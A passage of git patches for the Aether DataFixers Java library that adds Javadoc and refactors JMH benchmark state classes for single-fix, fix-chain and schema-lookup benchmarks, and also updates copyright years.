BenchmarkBootstrap.PLAYER_TYPE,
playerInput,
new DataVersion(1),
- new DataVersion(2));
- blackhole.consume(result);
+ new DataVersion(2)));
+ }
+
+ /**
+ * Shared JMH state for benchmarks parameterized by payload size.
+ *
+ * <p>This state is shared across all threads within a benchmark trial
+ * ({@link Scope#Benchmark}). The {@link #payloadSize} parameter controls the complexity of test data:
+ *
+ * <ul>
+ *   <li>SMALL: 5 fields, 2 nesting levels, 10 array elements</li>
+ *   <li>MEDIUM: 20 fields, 4 nesting levels, 100 array elements</li>
+ *   <li>LARGE: 50 fields, 6 nesting levels, 1000 array elements</li>
+ * </ul>
+ *
+ * @see PayloadSize
+ */
+ @State(Scope.Benchmark)
+ public static class SizedState {
+
+ /**
+ * The payload size parameter, injected by JMH. Controls the complexity of generated test data.
+ */
+ @Param({"SMALL", "MEDIUM", "LARGE"})
+ public PayloadSize payloadSize;
+
+ /**
+ * DataFixer configured with a single field rename fix (v1 → v2).
+ */
+ public DataFixer fixer;
+
+ /**
+ * DataFixer configured with an identity (no-op) fix for baseline measurement.
+ */
+ public DataFixer identityFixer;
+
+ /**
+ * Pre-generated input data matching {@link #payloadSize}.
+ */
+ public Dynamic input;
+
+ /**
+ * Source version for migrations (v1).
+ */
+ public DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
+ public DataVersion toVersion;
+
+ /**
+ * Initializes the benchmark state once per trial.
+ *
+ *
Creates fixers and generates test data based on the current
+ * {@link #payloadSize} parameter value.
This state is separate from {@link SizedState} because the player benchmark
+ * uses a fixed, realistic data structure rather than parameterized payload sizes. The player data simulates a
+ * typical game entity with nested objects, arrays, and various field types.
+ *
+ *
The player fix performs a complete codec roundtrip transformation,
+ * making it representative of real-world migration scenarios where data is decoded, transformed, and
+ * re-encoded.
+ *
+ * @see BenchmarkBootstrap#createPlayerFixer()
+ * @see BenchmarkDataGenerator#generatePlayerData
+ */
+ @State(Scope.Benchmark)
+ public static class PlayerState {
+
+ /**
+ * DataFixer configured with a player-specific transformation fix. Performs codec decode → transform → encode
+ * cycle.
+ */
+ public DataFixer playerFixer;
+
+ /**
+ * Pre-generated player data structure with realistic game entity fields.
+ */
+ public Dynamic playerInput;
+
+ /**
+ * Source version for migrations (v1).
+ */
+ public DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
+ public DataVersion toVersion;
+
+ /**
+ * Initializes the player benchmark state once per trial.
+ *
+ *
Creates the player fixer and generates realistic player test data.
+ */
+ @Setup(Level.Trial)
+ public void setup() {
+ this.playerFixer = BenchmarkBootstrap.createPlayerFixer();
+ this.playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
+ this.fromVersion = new DataVersion(1);
+ this.toVersion = new DataVersion(2);
+ }
}
}
From ccb0fb9c9516258e559782dbc52035f52481e31e Mon Sep 17 00:00:00 2001
From: Erik
Date: Tue, 20 Jan 2026 21:08:37 +0100
Subject: [PATCH 07/39] Remove expected performance notes from
`SingleFixBenchmark` Javadoc for cleaner documentation.
---
.../datafixers/benchmarks/core/SingleFixBenchmark.java | 10 ++--------
1 file changed, 2 insertions(+), 8 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index 71dbef4..2ff7c49 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -110,8 +110,6 @@ public class SingleFixBenchmark {
* This represents a common, lightweight migration operation. The benchmark is parameterized by {@link PayloadSize}
* to measure scaling behavior.
*
- *
- *
* @param s the shared benchmark state containing fixer and input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -131,8 +129,6 @@ public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
* Use this as a baseline to calculate the true cost of transformations by subtracting identity time from other
* benchmark results.
*
- *
- *
* @param s the shared benchmark state containing identity fixer and input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -152,10 +148,8 @@ public void identityFix(final SizedState s, final Blackhole blackhole) {
* is decoded via codec, transformed, and re-encoded. This represents the upper bound of migration cost for complex
* object transformations.
*
- *
Expected performance: ~17-18 μs/op (significantly slower due to codec overhead)
- *
- *
The ~70x slowdown compared to {@link #singleRenameFix} is expected and
- * acceptable, as codec roundtrips involve reflection, object instantiation, and full serialization/deserialization
+ *
This benchmark is expected to be significantly slower than {@link #singleRenameFix}
+ * because codec roundtrips involve reflection, object instantiation, and full serialization/deserialization
* cycles.
Measures the performance of applying multiple sequential fixes,
- * simulating real-world migration scenarios where data may need to
- * traverse many version upgrades.
+ * <p>Measures how fix chain length affects migration performance. This benchmark
+ * is essential for understanding the scalability characteristics of the DataFixer
+ * system when applying multiple sequential fixes.
+ *
+ * <h2>Benchmark Methods</h2>
+ *
+ * <ul>
+ *   <li>{@link #renameChain} - Chain of homogeneous field rename operations</li>
+ *   <li>{@link #mixedChain} - Chain of heterogeneous operations (renames, additions, transformations)</li>
+ *   <li>{@link #partialChain} - Partial chain execution stopping at halfway version</li>
+ * </ul>
+ *
+ * <h2>Parameters</h2>
+ *
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>fixCount</td><td>1, 5, 10, 25, 50</td><td>Number of fixes in the chain</td></tr>
+ *   <tr><td>payloadSize</td><td>SMALL, MEDIUM</td><td>Input data complexity</td></tr>
+ * </table>
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for statistical significance)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds
+ *
+ *
+ * <h2>Interpreting Results</h2>
+ *
+ * <ul>
+ *   <li>Linear scaling: Ideal behavior where time scales proportionally with fix count.</li>
+ *   <li>Sub-linear scaling: Better than expected, indicates optimization opportunities being exploited.</li>
+ *   <li>Super-linear scaling: Indicates potential performance issues with long chains.</li>
+ *   <li>Error (±): 99.9% confidence interval. Larger values with more fixes may indicate GC pressure.</li>
+ * </ul>
+ *
+ * <h2>Usage</h2>
+ * <pre>{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar MultiFixChainBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar MultiFixChainBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific fix count and payload size
+ * java -jar benchmarks.jar MultiFixChainBenchmark -p fixCount=10 -p payloadSize=SMALL
+ *
+ * # Generate CSV output for analysis
+ * java -jar benchmarks.jar MultiFixChainBenchmark -rf csv -rff chain_results.csv
+ * }</pre>
*
* @author Erik Pförtner
+ * @see SingleFixBenchmark
+ * @see BenchmarkBootstrap#createChainFixer(int)
+ * @see BenchmarkBootstrap#createMixedFixer(int)
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -64,34 +114,130 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class MultiFixChainBenchmark {
+ /**
+ * The number of fixes in the chain, injected by JMH.
+ *
+ *
This parameter controls the length of the fix chain being benchmarked.
+ * Higher values test the system's ability to handle long migration paths
+ * efficiently.
+ *
+ *
+ *
1: Baseline single-fix performance (compare with {@link SingleFixBenchmark})
+ *
5: Short chain typical of minor version updates
+ *
10: Medium chain representing moderate version gaps
+ *
25: Long chain simulating significant version jumps
+ *
50: Stress test for extended migration paths
+ *
+ */
@Param({"1", "5", "10", "25", "50"})
private int fixCount;
+ /**
+ * The payload size parameter, injected by JMH.
+ *
+ *
Controls the complexity of generated test data. Only SMALL and MEDIUM
+ * sizes are used to keep benchmark runtime reasonable while still capturing
+ * scaling behavior.
+ *
+ * @see PayloadSize
+ */
@Param({"SMALL", "MEDIUM"})
private PayloadSize payloadSize;
+ /**
+ * DataFixer configured with a chain of homogeneous field rename fixes.
+ *
+ *
Each fix in the chain performs a simple field rename operation (v{@code n} → v{@code n+1}).
+ * This represents the best-case scenario for chain execution.
+ */
private DataFixer chainFixer;
+
+ /**
+ * DataFixer configured with a chain of heterogeneous fix operations.
+ *
+ *
The chain includes a mix of rename, add, and transform operations to
+ * simulate realistic migration scenarios. Falls back to {@link #chainFixer}
+ * if mixed fixer creation fails.
Regenerated at each iteration to ensure consistent GC behavior
+ * and avoid caching effects.
+ */
private Dynamic input;
+
+ /**
+ * Source version for migrations (always v1).
+ */
private DataVersion fromVersion;
+
+ /**
+ * Target version for full chain migrations (v{@link #fixCount} + 1).
+ */
private DataVersion toVersion;
+ /**
+ * Target version for partial chain migrations (approximately half of {@link #toVersion}).
+ *
+ *
Used by {@link #partialChain} to measure performance when only part
+ * of the available fixes are applied.
+ */
+ private DataVersion halfwayToVersion;
+
+ /**
+ * Initializes the benchmark state once per trial.
+ *
+ *
Creates the chain and mixed fixers based on the current {@link #fixCount}
+ * parameter. Also calculates the version bounds for full and partial chain
+ * execution.
+ *
+ *
If mixed fixer creation fails (e.g., due to unsupported operations),
+ * the chain fixer is used as a fallback to ensure the benchmark can still run.
+ */
@Setup(Level.Trial)
- public void setup() {
+ public void setupTrial() {
this.chainFixer = BenchmarkBootstrap.createChainFixer(this.fixCount);
- if (this.fixCount >= 4) {
+
+ try {
this.mixedFixer = BenchmarkBootstrap.createMixedFixer(this.fixCount);
+ } catch (final RuntimeException ex) {
+ this.mixedFixer = this.chainFixer;
}
- this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize);
+
this.fromVersion = new DataVersion(1);
this.toVersion = new DataVersion(this.fixCount + 1);
+
+ final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1);
+ this.halfwayToVersion = new DataVersion(halfwayVersion);
+ }
+
+ /**
+ * Regenerates input data at each iteration.
+ *
+ *
Fresh data generation per iteration ensures that:
+ *
+ *
GC behavior is consistent across iterations
+ *
JIT optimizations don't over-specialize on specific data patterns
+ *
Memory allocation patterns are representative of real usage
+ *
+ */
+ @Setup(Level.Iteration)
+ public void setupIteration() {
+ this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize);
}
/**
- * Benchmarks applying a chain of rename fixes.
+ * Benchmarks a chain of homogeneous field rename operations.
*
- *
All fixes in the chain perform the same operation type (rename),
- * measuring sequential fix application overhead.
+ *
Measures the performance of applying {@link #fixCount} sequential rename
+ * fixes to migrate data from v1 to v{@code fixCount+1}. This represents an
+ * optimistic scenario where all fixes perform the same lightweight operation.
+ *
+ *
Use this benchmark to establish baseline chain performance and detect
+ * any non-linear scaling behavior in the fix application pipeline.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -106,20 +252,24 @@ public void renameChain(final Blackhole blackhole) {
}
/**
- * Benchmarks applying a chain of mixed fix types.
+ * Benchmarks a chain of heterogeneous fix operations.
+ *
+ *
Measures the performance of applying {@link #fixCount} sequential fixes
+ * that include a mix of operations:
+ *
+ *
Field renames
+ *
Field additions with default values
+ *
Field transformations (type conversions, value mappings)
+ *
*
- *
Includes rename, add, remove, and transform operations
- * for more realistic migration scenarios.
+ *
This benchmark provides a more realistic performance profile compared
+ * to {@link #renameChain}, as real-world migrations typically involve
+ * diverse operations.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void mixedChain(final Blackhole blackhole) {
- if (this.mixedFixer == null) {
- // Skip for fixCount < 4
- blackhole.consume(this.input);
- return;
- }
final Dynamic result = this.mixedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.input,
@@ -129,21 +279,29 @@ public void mixedChain(final Blackhole blackhole) {
}
/**
- * Benchmarks partial migration (half the chain).
+ * Benchmarks partial chain execution stopping at halfway version.
+ *
+ *
Measures the performance of applying only half of the available fixes
+ * in the chain. This simulates scenarios where:
+ *
+ *
Data is migrated incrementally rather than to the latest version
+ *
Target version is not the most recent available
+ *
Partial upgrades are performed for compatibility reasons
+ *
*
- *
Measures performance when migrating to an intermediate version
- * rather than the latest version.
+ *
Comparing this benchmark with {@link #renameChain} reveals whether
+ * fix selection and version range calculations add significant overhead.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void partialChain(final Blackhole blackhole) {
- final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1);
final Dynamic result = this.chainFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.input,
this.fromVersion,
- new DataVersion(halfwayVersion));
+ this.halfwayToVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index d895b69..a8dbb42 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -41,17 +41,66 @@
import org.openjdk.jmh.annotations.Warmup;
import org.openjdk.jmh.infra.Blackhole;
-import java.util.Random;
+import java.util.SplittableRandom;
import java.util.concurrent.TimeUnit;
/**
* JMH benchmark for schema registry lookup performance.
*
- *
Measures the performance of {@link SchemaRegistry#get(DataVersion)}
- * with varying registry sizes. Uses floor semantics (finds greatest version
- * less than or equal to requested).
+ *
Measures the overhead of various schema lookup operations as registry size grows.
+ * Schema lookups are performed frequently during data migration, so their performance directly impacts overall
+ * migration throughput.
+ *
+ *
Benchmark Methods
+ *
+ *
{@link #exactLookup} - Direct lookup by exact version match
+ *
{@link #floorLookup} - Floor lookup finding closest version ≤ target
+ *
{@link #latestLookup} - Retrieval of the most recent schema
+ *
{@link #sequentialLookup} - Sequential traversal of all registered versions
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
schemaCount
10, 50, 100, 500
Number of schemas in the registry
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for statistical significance)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Nanoseconds
+ *
+ *
+ *
Interpreting Results
+ *
+ *
O(1) lookups: {@link #exactLookup} and {@link #latestLookup} should show constant time regardless of registry size.
+ *
O(log n) lookups: {@link #floorLookup} may show logarithmic scaling if implemented via binary search.
+ *
O(n) lookups: {@link #sequentialLookup} should scale linearly with schema count.
+ *
Cache effects: Larger registries may show increased lookup time due to CPU cache pressure.
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SchemaLookupBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific schema count only
+ * java -jar benchmarks.jar SchemaLookupBenchmark -p schemaCount=100
+ *
+ * # Run specific lookup benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark.exactLookup
+ * }
*
* @author Erik Pförtner
+ * @see SchemaRegistry
+ * @see SimpleSchemaRegistry
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -62,87 +111,274 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class SchemaLookupBenchmark {
- @Param({"10", "50", "100", "500"})
- private int schemaCount;
-
- private SchemaRegistry registry;
- private DataVersion[] versions;
- private DataVersion[] lookupVersions;
- private Random random;
-
- @Setup(Level.Trial)
- public void setup() {
- // Create registry with specified number of schemas
- final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry();
- this.versions = new DataVersion[this.schemaCount];
-
- for (int i = 0; i < this.schemaCount; i++) {
- final int version = (i + 1) * 10; // 10, 20, 30, ...
- this.versions[i] = new DataVersion(version);
- simpleRegistry.register(MockSchemas.minimal(version));
- }
- simpleRegistry.freeze();
- this.registry = simpleRegistry;
-
- // Create lookup versions (including versions between registered versions)
- this.lookupVersions = new DataVersion[this.schemaCount * 2];
- for (int i = 0; i < this.lookupVersions.length; i++) {
- this.lookupVersions[i] = new DataVersion((i + 1) * 5); // 5, 10, 15, ...
- }
-
- this.random = new Random(42); // Fixed seed for reproducibility
- }
-
/**
- * Benchmarks looking up an exact registered version.
+ * Benchmarks exact version lookup performance.
+ *
+ *
Measures the time to retrieve a schema by its exact registered version.
+ * This is the most common lookup pattern during migration when the source version is known precisely.
+ *
+ *
The benchmark uses pre-generated random indices to avoid RNG overhead
+ * in the measurement loop. Each invocation looks up a different random version to prevent branch prediction
+ * optimization.
*
+ * @param s the shared benchmark state containing the registry and versions
+ * @param t the per-thread state providing random lookup indices
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void exactLookup(final Blackhole blackhole) {
- final int index = this.random.nextInt(this.schemaCount);
- final Schema schema = this.registry.get(this.versions[index]);
+ public void exactLookup(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final int index = t.nextExactIndex();
+ final Schema schema = s.registry.get(s.versions[index]);
blackhole.consume(schema);
}
/**
- * Benchmarks looking up a version using floor semantics.
+ * Benchmarks floor lookup performance.
*
- *
Half of the lookups will be for exact versions, half will
- * require floor resolution.
+ *
Measures the time to retrieve a schema using floor semantics, where
+ * the registry returns the schema with the highest version ≤ the requested version. This pattern is used when
+ * data may be at intermediate versions not explicitly registered.
*
+ *
The lookup versions include both exact matches (10, 20, 30, ...) and
+ * in-between values (5, 15, 25, ...) to exercise both fast-path exact matches and slower floor searches.
+ *
+ * @param s the shared benchmark state containing the registry and lookup versions
+ * @param t the per-thread state providing random lookup indices
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void floorLookup(final Blackhole blackhole) {
- final int index = this.random.nextInt(this.lookupVersions.length);
- final Schema schema = this.registry.get(this.lookupVersions[index]);
+ public void floorLookup(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final int index = t.nextFloorIndex();
+ final Schema schema = s.registry.get(s.lookupVersions[index]);
blackhole.consume(schema);
}
/**
- * Benchmarks getting the latest schema.
+ * Benchmarks latest schema retrieval performance.
+ *
+ *
Measures the time to retrieve the most recent schema from the registry.
+ * This operation should be O(1) as the latest schema is typically cached or stored in a dedicated field.
*
+ *
This benchmark serves as a baseline for the fastest possible lookup
+ * operation and helps identify any unexpected overhead in the registry implementation.
+ *
+ * @param s the shared benchmark state containing the registry
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void latestLookup(final Blackhole blackhole) {
- final Schema schema = this.registry.latest();
+ public void latestLookup(final BenchmarkState s,
+ final Blackhole blackhole) {
+ final Schema schema = s.registry.latest();
blackhole.consume(schema);
}
/**
- * Benchmarks sequential lookup of all versions.
+ * Benchmarks sequential lookup of all registered schemas.
+ *
+ *
Measures the aggregate time to look up every schema in the registry
+ * in version order. This pattern occurs during schema validation, debugging, or when building migration path
+ * analyses.
*
- *
Measures cache-friendly access patterns.
+ *
Note: This benchmark performs multiple lookups per invocation
+ * ({@code schemaCount} lookups). The reported time is for the entire sequence, not per-lookup. Divide by
+ * {@code schemaCount} to get per-lookup overhead.
*
+ * @param s the shared benchmark state containing the registry and versions
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void sequentialLookup(final Blackhole blackhole) {
- for (final DataVersion version : this.versions) {
- final Schema schema = this.registry.get(version);
+ public void sequentialLookup(final BenchmarkState s,
+ final Blackhole blackhole) {
+ for (final DataVersion version : s.versions) {
+ final Schema schema = s.registry.get(version);
blackhole.consume(schema);
}
}
+
+ /**
+ * Shared JMH state containing the schema registry and version arrays.
+ *
+ * <p>This state is shared across all threads within a benchmark trial
+ * ({@link Scope#Benchmark}). The registry is populated with mock schemas at versions 10, 20, 30, ... up to
+ * {@code schemaCount * 10}.
+ *
+ * <p>The registry is frozen after setup to match production usage patterns
+ * where registries are immutable during normal operation.
+ */
+ @State(Scope.Benchmark)
+ public static class BenchmarkState {
+
+ /**
+ * The number of schemas to register, injected by JMH.
+ *
+ *
Controls the size of the schema registry to measure lookup
+ * performance scaling:
+ *
+ *
10: Small registry, fits entirely in L1 cache
+ *
50: Medium registry, typical for most applications
+ *
100: Large registry, may exceed L1 cache
+ *
500: Stress test for registry scalability
+ *
+ */
+ @Param({"10", "50", "100", "500"})
+ public int schemaCount;
+
+ /**
+ * The frozen schema registry containing all registered schemas.
+ */
+ public SchemaRegistry registry;
+
+ /**
+ * Array of exact registered versions (10, 20, 30, ...).
+ *
+ *
Used by {@link #exactLookup} to ensure lookups always hit
+ * registered versions.
+ */
+ public DataVersion[] versions;
+
+ /**
+ * Array of lookup versions including in-between values (5, 10, 15, 20, ...).
+ *
+ *
Used by {@link #floorLookup} to exercise both exact matches
+ * and floor search behavior.
+ */
+ public DataVersion[] lookupVersions;
+
+ /**
+ * Initializes the schema registry and version arrays once per trial.
+ *
+ *
Creates a {@link SimpleSchemaRegistry} populated with minimal mock
+ * schemas at regular version intervals. The registry is frozen after population to enable any internal
+ * optimizations.
+ */
+ @Setup(Level.Trial)
+ public void setup() {
+ final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry();
+ this.versions = new DataVersion[this.schemaCount];
+
+ for (int i = 0; i < this.schemaCount; i++) {
+ final int version = (i + 1) * 10;
+ final DataVersion dataVersion = new DataVersion(version);
+ this.versions[i] = dataVersion;
+ simpleRegistry.register(MockSchemas.minimal(version));
+ }
+
+ simpleRegistry.freeze();
+ this.registry = simpleRegistry;
+
+ this.lookupVersions = new DataVersion[this.schemaCount * 2];
+ for (int i = 0; i < this.lookupVersions.length; i++) {
+ this.lookupVersions[i] = new DataVersion((i + 1) * 5);
+ }
+ }
+ }
+
+ /**
+ * Per-thread JMH state providing pre-generated random lookup indices.
+ *
+ * <p>Random number generation is expensive and would dominate the benchmark
+ * if performed in the hot path. This state pre-generates buffers of random indices during setup, allowing the
+ * benchmark methods to retrieve indices via simple array access and bit masking.
+ *
+ * <p>Each thread has its own state instance ({@link Scope#Thread}) to avoid
+ * contention on shared RNG state. The fixed seed ensures reproducible results across benchmark runs.
+ *
+ * @see BenchmarkState
+ */
+ @State(Scope.Thread)
+ public static class ThreadState {
+
+ /**
+ * Size of the pre-generated index buffer.
+ *
+ *
Power-of-two size enables cheap index wrapping via bit masking
+ * instead of modulo operation.
+ */
+ private static final int INDEX_BUFFER_SIZE = 1024;
+
+ /**
+ * Bit mask for wrapping cursor to buffer bounds ({@code INDEX_BUFFER_SIZE - 1}).
+ */
+ private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1;
+
+ /**
+ * Pre-generated indices into {@link BenchmarkState#versions}.
+ */
+ private final int[] exactIndices = new int[INDEX_BUFFER_SIZE];
+
+ /**
+ * Pre-generated indices into {@link BenchmarkState#lookupVersions}.
+ */
+ private final int[] floorIndices = new int[INDEX_BUFFER_SIZE];
+
+ /**
+ * Current position in {@link #exactIndices}.
+ */
+ private int exactCursor;
+
+ /**
+ * Current position in {@link #floorIndices}.
+ */
+ private int floorCursor;
+
+ /**
+ * Thread-local random number generator for index generation.
+ */
+ private SplittableRandom random;
+
+ /**
+ * Initializes the random number generator once per trial.
+ *
+ *
Uses a fixed seed (42) for reproducibility. Each thread gets its
+ * own {@link SplittableRandom} instance to avoid synchronization overhead.
+ */
+ @Setup(Level.Trial)
+ public void setupTrial() {
+ this.random = new SplittableRandom(42L);
+ }
+
+ /**
+ * Refills the index buffers at each iteration.
+ *
+ *
Generates fresh random indices based on the current
+ * {@link BenchmarkState#schemaCount} parameter. Resets cursors to the beginning of each buffer.
+ *
+ * @param s the shared benchmark state providing array bounds
+ */
+ @Setup(Level.Iteration)
+ public void setupIteration(final BenchmarkState s) {
+ for (int i = 0; i < INDEX_BUFFER_SIZE; i++) {
+ this.exactIndices[i] = this.random.nextInt(s.versions.length);
+ this.floorIndices[i] = this.random.nextInt(s.lookupVersions.length);
+ }
+ this.exactCursor = 0;
+ this.floorCursor = 0;
+ }
+
+ /**
+ * Returns the next random index for exact version lookup.
+ *
+ *
Uses bit masking to wrap around the buffer efficiently.
+ *
+ * @return a random index into {@link BenchmarkState#versions}
+ */
+ public int nextExactIndex() {
+ return this.exactIndices[this.exactCursor++ & INDEX_MASK];
+ }
+
+ /**
+ * Returns the next random index for floor version lookup.
+ *
+ *
Uses bit masking to wrap around the buffer efficiently.
+ *
+ * @return a random index into {@link BenchmarkState#lookupVersions}
+ */
+ public int nextFloorIndex() {
+ return this.floorIndices[this.floorCursor++ & INDEX_MASK];
+ }
+ }
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
new file mode 100644
index 0000000..08423be
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Core JMH benchmarks for the Aether DataFixers framework.
+ *
+ * <p>This package contains benchmarks that measure the fundamental performance characteristics
+ * of the data fixer system, including fix application, chain execution, and schema registry
+ * operations. These benchmarks form the foundation for performance regression testing and
+ * optimization efforts.
+ *
+ * <ul>
+ *   <li>Isolation: Each benchmark measures a single operation to isolate performance characteristics.</li>
+ *   <li>Parameterization: Benchmarks are parameterized to capture scaling behavior across different input sizes.</li>
+ *   <li>Reproducibility: Fixed seeds and deterministic data generation ensure reproducible results.</li>
+ *   <li>JMH Best Practices: All benchmarks follow JMH guidelines including proper use of {@code Blackhole},
+ *       state scoping, and setup level annotations.</li>
+ * </ul>
+ *
+ * <h2>Interpreting Results</h2>
+ *
+ * <p>All benchmarks in this package report both throughput (ops/time) and average time (time/op).
+ * When comparing results:
+ *
+ * <ul>
+ *   <li>Compare measurements from the same JVM version and hardware</li>
+ *   <li>Consider the 99.9% confidence interval (error bounds)</li>
+ *   <li>Run multiple forks to account for JIT compilation variance</li>
+ *   <li>Use baseline benchmarks (e.g., identity fix) to isolate framework overhead</li>
+ * </ul>
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.core;
From 58d5f6c06618b2062dbf3e11254e0031a714d486 Mon Sep 17 00:00:00 2001
From: Erik
Date: Mon, 26 Jan 2026 22:17:47 +0100
Subject: [PATCH 21/39] Update copyright year to 2026 in benchmark files
---
.../aether/datafixers/benchmarks/BenchmarkRunner.java | 2 +-
.../datafixers/benchmarks/codec/CollectionCodecBenchmark.java | 2 +-
.../datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java | 3 +--
.../benchmarks/concurrent/ConcurrentMigrationBenchmark.java | 2 +-
.../datafixers/benchmarks/core/MultiFixChainBenchmark.java | 2 +-
.../datafixers/benchmarks/core/SchemaLookupBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/core/SingleFixBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/core/package-info.java | 2 +-
.../datafixers/benchmarks/format/CrossFormatBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/JsonBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/TomlXmlBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/YamlBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/util/BenchmarkBootstrap.java | 2 +-
.../datafixers/benchmarks/util/BenchmarkDataGenerator.java | 2 +-
.../aether/datafixers/benchmarks/util/PayloadSize.java | 2 +-
15 files changed, 15 insertions(+), 16 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
index 4467845..d8f91e8 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
